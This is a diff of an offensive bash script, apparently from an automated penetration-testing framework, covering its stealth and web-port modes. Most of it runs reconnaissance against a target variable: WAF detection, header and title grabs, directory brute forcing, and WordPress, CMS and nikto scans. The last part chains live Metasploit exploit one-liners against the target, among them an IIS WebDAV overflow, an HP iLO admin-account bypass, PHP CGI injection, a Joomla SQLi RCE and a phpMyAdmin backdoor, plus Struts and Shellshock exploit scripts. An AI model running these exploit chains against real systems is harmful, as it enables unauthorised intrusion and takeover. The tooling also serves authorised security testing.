sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
if [ $WAFWOOF == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https 2> /dev/null$RESET"
fi
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
rm -f tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
fi
if [ $WHATWEB == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null$RESET"
fi
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null$RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
fi
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
fi
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
@ -201,32 +282,48 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 1
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
fi
blackwidow -u https://$TARGET:443 -l 3 -v n
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
fi
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null$RESET"
fi
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
fi
if [ "$SSL" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --regular $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null$RESET"
fi
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
fi
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
fi
@ -248,6 +345,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e ""
echo -e ""
echo -e ""
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
if [ "$LOOT" = "1" ]; then
loot

View File

@ -72,197 +72,318 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-$PORT 2> /dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-$PORT 2> /dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
if [ "$WAFWOOF" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
echo ""
fi
if [ "$WHATWEB" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
echo ""
fi
if [ "$WIG" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
fi
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 3 -s y 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET:$PORT --disable-tls-checks
echo ""
wpscan --url http://$TARGET:$PORT/wordpress/ --disable-tls-checks
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET:$PORT
echo ""
cmsmap http://$TARGET:$PORT/wordpress/
echo ""
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
echo ""
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
echo ""
fi
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
